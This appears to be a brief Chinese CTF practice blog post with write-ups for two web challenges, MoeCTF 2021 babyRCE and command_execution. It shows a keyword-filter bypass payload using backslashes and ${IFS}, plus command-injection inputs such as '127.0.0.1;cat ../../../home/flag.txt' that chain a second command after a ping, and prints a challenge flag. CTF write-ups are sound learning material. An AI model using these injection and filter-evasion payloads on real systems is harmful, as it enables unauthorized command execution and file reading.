刷题2024.10.19
[TOC]
[MoeCTF 2021]babyRCE
考点:关键词过滤
来源:nssctf
1 | <?php |
先用ls查看
构造payload:
1 ?rce=ca\t${IFS}fl\ag.php
注意:1.有时候使用cat会一片空白,需要查看源码
2.允许的条件下,可以先用ls,再用cat
command_execution
考点:命令执行
来源:攻防世界
先ping一下127.0.0.1
再用;来连接两个命令 127.0.0.1;ls
试试看能不能查看inddex.php
127.0.0.1;cat index.php
很明显,不行,那就退级看看
在home中发现flag。
查看flag
127.0.0.1;cat …/…/…/home/flag.txt
1 | cyberpeace{ac541782e73fa1da4a98ec4bc3449fb1} |
评论